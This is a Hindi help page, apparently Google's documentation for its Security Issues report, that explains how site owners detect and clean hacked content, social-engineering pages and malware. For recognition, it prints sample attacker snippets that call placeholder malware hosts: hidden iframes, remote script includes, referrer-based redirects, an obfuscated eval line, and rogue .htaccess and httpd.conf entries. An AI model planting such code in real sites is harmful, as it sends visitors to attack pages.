सुरक्षा की समस्याओं वाली रिपोर्ट

Google ने जो समीक्षा की है अगर उससे पता चलता है कि आपकी साइट हैक की गई थी या आपकी साइट की किसी गतिविधि से वेबसाइट पर आने वालों या उनके कंप्यूटर को नुकसान पहुंच सकता है, तो सुरक्षा की समस्याओं वाली रिपोर्ट में इस बात की जानकारी दी जाएगी. नुकसान पहुंचाने वाली गतिविधियों के उदाहरण में फ़िशिंग हमले या साइट का इस्तेमाल करने वाले लोगों के कंप्यूटर पर मैलवेयर या अनचाहे साॅफ़्टवेयर इंस्टाॅल करना शामिल है.

जिन पेजों या साइटों में सुरक्षा की समस्या है वे खोज नतीजों में चेतावनी वाले लेबल के साथ दिख सकते हैं. साथ ही, इन्हें ऐक्सेस करने की कोशिश करते समय पेजों के खुलने से पहले ही उपयोगकर्ता को ब्राउज़र में चेतावनी वाला पेज दिख सकता है.

सुरक्षा की समस्याओं वाली रिपोर्ट खोलें

 

सुरक्षा की समस्याएं क्या होती हैं?

सुरक्षा की समस्याओं को इन श्रेणियों में बांटा गया है:

  • हैक की गई सामग्री: यह ऐसी कोई भी सामग्री हो सकती है जो आपकी मंज़ूरी के बगैर आपकी साइट पर डाल दी जाती है. ऐसा आपकी साइट में सुरक्षा की कमियों की वजह से होता है. हमारे उपयोगकर्ताओं की सुरक्षा के लिए, Google पूरी कोशिश करता है कि खोज नतीजों में हैक की गई सामग्री न दिखाई दे. ज़्यादा जानें.
  • मैलवेयर और अनचाहा सॉफ़्टवेयर: यह सॉफ़्टवेयर उपयोगकर्ताओं या उनके डिवाइस को नुकसान पहुंचाने के लिए बनाया जाता है. ऐसे सॉफ़्टवेयर से उपयोगकर्ताओं के साथ धोखाधड़ी की जाती है या उनके डिवाइस पर ऐसी गतिविधियां की जाती हैं जिनके बारे में उन्हें पता नहीं होता. इसके अलावा, इसकी वजह से उपयोगकर्ताओं को डिवाइस इस्तेमाल करने में परेशानी होती है. ज़्यादा जानें.
  • साेशल इंजीनियरिंग: यह ऐसी सामग्री होती है जिसका इस्तेमाल करके, साइट पर आने वाले लाेगाें काे गुमराह किया जाता है. साथ ही, ऐसी गतिविधियां कराने की कोशिश की जाती है जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. ज़्यादा जानें.

क्या मेरी साइट में सुरक्षा की समस्याएं हैं?

अगर आपकी साइट में सुरक्षा की समस्याएं हैं, तो आपको रिपोर्ट के सबसे ऊपरी हिस्से में साइट में मौजूद सुरक्षा समस्याओं की कुल संख्या दिखाई देगी.

अगर आपकी साइट में सुरक्षा की समस्याएं नहीं हैं, तो आपको हरे रंग का सही का निशान और इस बारे में एक मैसेज दिखाई देगा.

मैंने यह साइट अभी खरीदी है!

अगर आपने हाल ही में कोई ऐसी साइट खरीदी है जिसमें पहले से ही सुरक्षा की समस्याएं थीं, तो पहले रिपोर्ट में दी गई सभी समस्याओं को ठीक करें. इसके बाद, साइट की फिर से समीक्षा करने का अनुरोध करें. साथ ही, हमें यह जानकारी दें कि आपने यह साइट हाल ही में खरीदी है और अब यह साइट Google वेबमास्टर गाइडलाइंस का पालन करती है.

किन पेजों में सुरक्षा की समस्याएं हैं?

सुरक्षा की समस्याओं के उदाहरण वाले यूआरएल की सूची देखने के लिए, किसी समस्या की जानकारी वाला सेक्शन बड़ा करके देखें. इस सूची में शायद समस्या वाले सभी पेज शामिल न हों, लेकिन इसमें आपकी साइट के कुछ ऐसे पेज दिखाई देंगे, जिन पर आपकी चुनी गई समस्या मौजूद है. कभी-कभी ऐसा भी हो सकता है कि आपको रिपोर्ट में सुरक्षा की समस्या दिखाई दे, लेकिन उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है, क्योंकि कुछ वजहों से हम समस्या के उदाहरण नहीं जुटा पाते.

समस्या की जानकारी में, आपकी साइट पर पहली बार समस्या के बारे में पता चलने की तारीख दी गई होती है. साथ ही, थोड़े शब्दों में समस्या की जानकारी और समस्या के बारे में ज़्यादा जानने के लिए एक लिंक दिया गया होता है.

समस्या ठीक करना

अपनी साइट में सुरक्षा की समस्या ठीक करने के लिए:

  1. सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या की जानकारी वाला सेक्शन बड़ा करके देखें.
  2. समस्या की जानकारी पढ़ें. साथ ही, समस्या के बारे में ज़्यादा जानकारी पाने और उसे ठीक करने का तरीका जानने के लिए, "ज़्यादा जानें" लिंक पर क्लिक करें. ('ज़्यादा जानें' लिंक आपको इस पेज पर नीचे दी गई जानकारी तक ले जाएगा.)
  3. सुरक्षा की समस्या को ठीक करने के लिए, जानकारी वाले सेक्शन में दिए गए पेजों का इस्तेमाल करें. यह पेज उदाहरण के तौर पर दिए गए हैं. इस सूची में शायद समस्या वाले सभी पेज शामिल न हों, लेकिन इसमें आपकी साइट के कुछ ऐसे पेज होते हैं जिनमें यह समस्या मौजूद है. शायद आपको रिपोर्ट में सुरक्षा की ऐसी समस्या दिखाई दे, जिसके लिए उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है क्योंकि किसी वजह से हम उदाहरण जनरेट नहीं कर पाते.
  4. समस्या को पूरी साइट पर ठीक करें. सिर्फ़ कुछ ही पेजों पर समस्या ठीक करने से, यह ज़रूरी नहीं है कि वे पेज या आपकी साइट का कुछ हिस्सा खोज नतीजों में दिखने लगे.
  5. अगर रिपोर्ट में बताया गया है कि आपकी साइट में एक से ज़्यादा सुरक्षा की समस्याएं हैं, तो उन सभी समस्याओं की ठीक करें.
  6. समस्याओं को ठीक करने के बाद, उनकी जांच करें.
  7. रिपोर्ट में बताई गई सभी समस्याओं को सभी पेजों में ठीक करने के बाद, रिपोर्ट में समीक्षा करने का अनुरोध करें विकल्प चुनें. साइट की फिर से समीक्षा करने का अनुरोध करते समय, ठीक की गई गड़बड़ियों की जानकारी दें. अच्छे अनुरोध में तीन चीज़ें शामिल होती हैं:
    • साइट की क्वालिटी की समस्या के बारे में सटीक जानकारी.
    • समस्या को ठीक करने के लिए उठाए गए कदमों की जानकारी.
    • समस्या को ठीक करने की हर कोशिश के नतीजों की जानकारी.
  8. साइट की फिर से समीक्षा करने में एक या दो हफ़्ते लग सकते हैं. आपको ईमेल से यह सूचना दी जाएगी कि आपकी समीक्षा पर कितना काम हुआ है. अनुरोध किए जाने पर आपको समीक्षा की पुष्टि वाला एक मैसेज मिलेगा, ताकि आपको यह पता चल जाए कि आपकी साइट की समीक्षा की जा रही है. जब तक आपको पिछले अनुरोध पर कोई आखिरी फ़ैसला नहीं मिल जाता, तब तक फिर से समीक्षा करने का अनुरोध न करें.

साइट की फिर से समीक्षा होने में कितना समय लगेगा?

एक से दो हफ़्ते लग सकते हैं. साइट की समीक्षा करने का अनुरोध मिलने के बाद, हम आपको ईमेल से इसकी सूचना देंगे ताकि आपको पता चल जाए कि आपके अनुरोध पर कार्रवाई की जा रही है. समीक्षा पूरी होने पर भी आपको इस बारे में ईमेल से जानकारी भेजी जाएगी.

जब तक आपके पिछले अनुरोधों पर फ़ैसला न मिल जाए, तब तक कृपया अपनी साइट की फिर से समीक्षा करने का अनुरोध न करें. अगर आप साइट की समस्याओं को ठीक किए बगैर ही साइट की फिर से समीक्षा करने के लिए अनुरोध करते हैं, तो आपके अगले अनुरोध का जवाब मिलने में ज़्यादा समय लग सकता है. साथ ही, आपकी पहचान बार-बार ऐसे उल्लंघन करने वाले के तौर पर की जा सकती है.

सुरक्षा की समस्याओं वाली सूची

यहां पर साइट में हुई सुरक्षा की समस्याओं वाली सूची दी गई है. साथ ही, हर समस्या को ठीक करने का तरीका बताया गया है. समस्याओं को या तो गड़बड़ी या चेतावनी की श्रेणी में रखा गया है.

धोखाधड़ी की सामग्री वाले पेज

आपकी साइट पर ऐसी सामग्री मौजूद है जो साइट पर आने वाले लाेगाें काे गुमराह करती है. ऐसा करके उनसे ऐसी गतिविधियां कराने की कोशिश की जाती है जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. Google सुरक्षित ब्राउज़िंग से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है जहां पर धोखाधड़ी वाली सामग्री दिखाई जाती है.

वेब पेजों को धोखाधड़ी की सामग्री वाला पेज तब माना जाता है, जब वे:

  • किसी भराेसेमंद इकाई की नकल करें या उस जैसा व्यवहार करें, जैसे कि आपके डिवाइस या ब्राउज़र या किसी वेबसाइट की तरह या
  • आपको गुमराह करके ऐसा काम कराने की कोशिश करते हैं जाे आप सिर्फ़ किसी भराेसेमंद इकाई के लिए करेंगे. जैसे कि कोई पासवर्ड शेयर करना, तकनीकी सहायता के किसी नंबर पर कॉल करना या सॉफ़्टवेयर डाउनलोड करना.

इस तरह की धोखाधड़ी वाली सामग्री को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी की सामग्री वाले पेजों के उदाहरण देखें.

समस्या ठीक करना

1. समस्या का पता लगाएं

धोखाधड़ी वाली सामग्री का पता लगाने के लिए उदाहरण वाले पेजों पर जाएं. आप यूआरएल की जाँच करने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप दोनों वर्शन में देख सकते हैं.

2. पेजों में समस्याएं ठीक करें

साेशल इंजीनियरिंग की सामग्री वाले पेजों की समस्याएं ठीक करें. अगर आपको लगता है कि 'सुरक्षित ब्राउज़िंग' ने गलती से किसी वेब पेज को गड़बड़ी की श्रेणी में रख दिया है, तो कृपया यहां रिपोर्ट करें.

3. समीक्षा का अनुरोध करें

जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तब सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

धोखाधड़ी के लिए साइट में जोड़े गए रिसॉर्स

आपकी साइट में धोखाधड़ी वाले विज्ञापन या धोखाधड़ी के लिए जोड़े गए रिसॉर्स हैं. ये आपकी साइट पर आने वाले लाेगाें काे गुमराह करके ऐसी गतिविधियां कराने की कोशिश करते हैं जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या अनचाहे सॉफ़्टवेयर डाउनलाेड करना शामिल है. धोखाधड़ी वाली सामग्री, पेज में एम्बेड किए गए रिसॉर्स जैसे इमेज, तीसरे-पक्ष की सामग्रियों या विज्ञापनों से साइट में शामिल की जा सकती है. Google सुरक्षित ब्राउज़िंग से वेब उपयाेगकर्ताओं काे चेतावनी देकर ऐसे पेजाें पर जाने से राेका जाता है जहां पर धोखाधड़ी वाली सामग्री दिखाई जाती है.

कभी-कभी उपयोगकर्ताओं को यह सामग्री होस्ट पेज पर दिखती है. दूसरे मामलों में, होस्ट साइट पर कोई भी विज्ञापन नहीं दिखता. हालांकि, पॉप-अप, पॉप-अंडर या दूसरी तरह के रीडायरेक्ट इस्तेमाल करके उपयाेगकर्ताओं काे नुकसान पहुंंचाने वाले पेजाें पर ले जाया जाता है. सभी मामलों में, साइट में ऐसी सामग्री जोड़ने पर, इसे होस्ट पेज के लिए नीति का उल्लंघन माना जाएगा.

इस तरह की धोखाधड़ी वाली सामग्री को सोशल इंजीनियरिंग कहा जाता है. सोशल इंजीनियरिंग के बारे में ज़्यादा जानें या धोखाधड़ी के लिए साइट में जोड़े गए रिसॉर्स के उदाहरण देखें.

समस्या ठीक करना

1. समस्या का पता लगाएं

धोखाधड़ी वाली सामग्री का पता लगाने के लिए उदाहरण वाले पेजों पर जाएं. इस बात की पुष्टि करें कि आपकी साइट के किसी भी पेज पर धोखाधड़ी वाला कोई विज्ञापन, इमेज या तीसरे पक्ष का एम्बेड किया गया कोई और रिसॉर्स मौजूद न हो. ध्यान दें कि विज्ञापन नेटवर्क वाली कंपनियां, आपकी साइट पर दिखाए जाने वाले विज्ञापन बदल सकती हैं. इसलिए, साेशल इंजीनियरिंग वाला विज्ञापन देखने के लिए शायद आपको कुछ बार पेज रीफ़्रेश करना पड़े. कुछ विज्ञापन मोबाइल डिवाइस और डेस्कटॉप कंप्यूटर पर अलग-अलग तरह से दिखाई दे सकते हैं. आप यूआरएल की जांच करने वाला टूल इस्तेमाल करके, अपनी साइट को मोबाइल और डेस्कटॉप, दोनों वर्शन में देख सकते हैं.

2. धोखाधड़ी वाले विज्ञापनों या रिसॉर्स को साइट से हटाएं

अपनी साइट में शामिल तीसरे पक्ष के रिसॉर्स की जांच करें. देख लें कि आपकी साइट के किसी भी पेज पर मौजूद विज्ञापनों, इमेज या एम्बेड किए गए तीसरे पक्ष के रिसॉर्स में धोखाधड़ी वाली सामग्री शामिल न हो. साेशल इंजीनियरिंग की सामग्री वाले पेजों की समस्याएं ठीक करें. 

3. समीक्षा का अनुरोध करें

जब आप यह पुष्टि कर देते हैं कि आपकी साइट की समस्या को ठीक कर लिया गया है, तो सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

मैलवेयर
नुकसान पहुंचाने वाले किसी हैकर ने आपकी साइट में मैलवेयर इस्तेमाल करके कुछ गड़बड़ी की है या साइट पर मैलवेयर डाल दिया है. मैलवेयर एक खास तरह का सॉफ़्टवेयर या मोबाइल ऐप्लिकेशन होता है, जिसे किसी कंप्यूटर या मोबाइल डिवाइस को नुकसान पहुंचाने के लिए बनाया जाता है. यह किसी सॉफ़्टवेयर या उसका इस्तेमाल करने वालों को भी नुकसान पहुंचा सकता है.

1. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

अपनी साइट पर मैलवेयर की समस्या को ठीक करने के लिए, आपको कोड को पढ़ना और समझना आना चाहिए. साथ ही, अपनी साइट के वेब सर्वर कॉन्फ़िगरेशन की जानकारी भी होनी चाहिए. अगर आपको लगता है कि आप इस समस्या को खुद नहीं सुलझा सकते, तो मदद पाने के लिए सहायता टीम बनाएं लेख पढ़ें.

2. अपनी साइट में मैलवेयर की समस्या का पता लगाएं और उसे ठीक करें

मैलवेयर कई तरह के होते हैं. साइट में किसी खास तरह के मैलवेयर के बारे में पता लगाने और उसे ठीक करने के लिए, इन सेक्शन को पढ़ें. ध्यान दें कि आपकी साइट में एक से ज़्यादा तरह के मैलवेयर हो सकते हैं. इसलिए, अपनी साइट की अच्छी तरह से जांच करें और समस्याओं को ठीक करें.

मैलवेयर किस तरह का है: सर्वर कॉन्फ़िगरेशन

जानकारी

किसी हैकर ने आपकी साइट हैक कर ली है और आपकी सुरक्षित साइट पर आने वाले लोगों को उनकी मैलवेयर हमलों वाली साइट पर भेज रहा है. ऐसा करने लिए, शायद उसने आपके वेब सर्वर की कॉन्फ़िगरेशन फ़ाइल (फ़ाइलों) में बदलाव किया है. आम तौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर .htaccess फ़ाइल और httpd.conf, दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.

समस्या को ठीक करना

1. समस्या का पता लगाएं

सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या के उदाहरण वाले यूआरएल पर जाएं.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

"सर्वर कॉन्फ़िगरेशन" मैलवेयर की समस्या वाले पेजों को cURL या Wget से देखने पर, उनके हेडर में आपको ये कोड दिख सकते हैं:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. "सर्वर कॉन्फ़िगरेशन" मैलवेयर की समस्या वाली अपनी साइट ठीक करें

शेल/टर्मिनल इस्तेमाल करके अपने सर्वर में लॉग इन करें (अगर आप चाहें, तो साइट को ऑफ़लाइन कर सकते हैं) और मैलवेयर की समस्या वाली सर्वर कॉन्फ़िगरेशन फ़ाइलों की समीक्षा करें. आपकी साइट पर हैक की गईं सर्वर कॉन्फ़िगरेशन वाली एक से ज़्यादा फ़ाइलें हो सकती हैं. इन फ़ाइलों में ऐसे निर्देश ढूंढें, जिन्हें आपने तय नहीं किया है. जैसे कि रीडायरेक्ट करने वाले निर्देश, जिससे उपयोगकर्ताओं को आपकी साइट से मैलवेयर हमले वाली अनजान साइटों पर भेजा जाता है. उदाहरण के लिए, .htaccess फ़ाइल में आपको इस तरह का रीडायरेक्ट दिख सकता है:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

इसके अलावा:

  • हैकर फ़ाइल के आखिरी हिस्से में ऐसी जगह पर मैलवेयर वाला कोड जोड़ सकता है, जहां हम उसे आसानी से न ढूंढ पाएं. इसलिए, पूरी फ़ाइल की अच्छी तरह से जाँच कर लें.
  • देखें कि क्या हैकर ने किसी ऐसी क्राॅन सुविधा का इस्तेमाल किया है जिससे .htaccess फ़ाइल अपने आप लगातार अपडेट हो रही है. क्राॅन सुविधा का इस्तेमाल कई जगहों पर किया जा सकता है जिनमें /etc/crontab (साथ ही, कई /etc/cron* डायरेक्ट्री) और /var/spool/cron शामिल हैं.
  • अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं.
मैलवेयर किस तरह का है: एसक्यूएल डालना

जानकारी

किसी हैकर ने शायद आपकी साइट के डेटाबेस में छेड़छाड़ की है. उदाहरण के लिए, शायद उसने किसी प्रोग्राम का इस्तेमाल करके, डेटाबेस टेबल की सभी जानकारी में मैलवेयर वाला कोड डाल दिया हो. इसलिए, जब सर्वर किसी ऐसे पेज को लोड करेगा जिसके लिए डेटाबेस की जानकारी इस्तेमाल की गई हो, तब उस पेज की सामग्री में एम्बेड किया गया मैलवेयर वाला कोड भी उस पेज के साथ लोड हो जाएगा. इस कोड की वजह से साइट का इस्तेमाल करने वालों को नुकसान पहुंच सकता है.

समस्या को ठीक करना

1. समस्या का पता लगाएं

जिन यूआरएल में समस्या है उन पर कमांड-लाइन में कुछ क्वेरी चलाएं. साथ ही, क्वेरी के जवाब में खुलने वाले पेज पर देखें कि "iframe" या "eval" जैसे नुकसान पहुंचाने वाले एसक्यूएल शब्द मौजूद हैं या नहीं.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

इसके बाद, अपने डेटाबेस के सर्वर में लॉग इन करें या phpMyAdmin जैसे किसी टूल की मदद से अपने डेटाबेस को देखें. अगर आपने Wget या cURL का इस्तेमाल किया है, तो Wget या cURL से पेज के सोर्स कोड में मिली गड़बड़ी की तुलना अपने डेटाबेस की एंट्री से करें. उदाहरण के लिए, अगर आपको अपने पेजों पर कोई खतरनाक iframe मिला है, तो आप उस iframe कोड को खोजने के लिए एसक्यूएल क्वेरी चला सकते हैं. उदाहरण के लिए:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';

आप असामान्य गतिविधियों का पता लगाने के लिए सर्वर पर मौजूद डेटाबेस के लॉग और गड़बड़ी वाली फ़ाइलों की जाँच ज़रूर करना चाहेंगे. उदाहरण के लिए, ऐसे एसक्यूएल कमांड जो आमतौर पर नहीं दिखते हैं और जो नियमित उपयोगकर्ता या गड़बड़ी के लिए असामान्य दिखते हैं.

2. अपनी साइट से मैलवेयर हटाएं

जब आप अपनी साइट से मैलवेयर हटाने के लिए तैयार हो जाएं, तब डेटाबेस के उन सभी रिकॉर्ड को अपडेट कर सकते हैं जिसमें समस्या है. इसके अलावा, आप डेटाबेस के उस बैक अप को भी वापस ला सकते हैं जिसमें कोई समस्या नहीं है.

इसके अलावा:

मैलवेयर किस तरह का है: कोड डालना

जानकारी

आपकी साइट के पेजों में बदलाव किया गया था, ताकि उसमें नुकसान पहुंचाने वाले कोड को शामिल किया जा सके. उदाहरण के लिए, जिस साइट पर मैलवेयर ने हमला किया है उसमें iframe को शामिल करना.

समस्या को ठीक करना

1. समस्या का पता लगाएं

सुरक्षा की समस्याओं वाली रिपोर्ट में उन यूआरएल की सूची दी गई है जिनमें समस्या है. सूची में शामिल यूआरएल पर जाएं. यूआरएल से खुले पेज के एचटीएमएल में नुकसान पहुंचाने वाले कोड की जांच करें.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

नुकसान पहुंचाने वाले कोड के कुछ उदाहरण नीचे दिए गए हैं:

  • वह iframe जो नुकसान पहुंचाने वाली साइट को लोड करता है:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • ऐसी JavaScript या और कोई स्क्रिप्टिंग की भाषा जो हमलावर साइट से स्क्रिप्ट को कॉल करती और चलाती है:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • ऐसी स्क्रिप्टिंग जो ब्राउज़र को एक हमलावर साइट पर रीडायरेक्ट करती है:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • नुकसान पहुंचाने वाले ऐसे कोड जिन्हें बदल दिया गया है, ताकि उनका पता नहीं लगाया जा सके:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • शेयर की गईं ऐसी ऑब्जेक्ट फ़ाइलें जिन्हें आम तौर पर सुरक्षित माने जानी वाली स्क्रिप्ट से छेड़छाड़ करने के लिए बनाया जाता है. ये फ़ाइलें इस्तेमाल करके नुकसान पहुंचाने वाले कोड को बिना किसी तय तरीके के स्क्रिप्ट में डाला जाता है:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

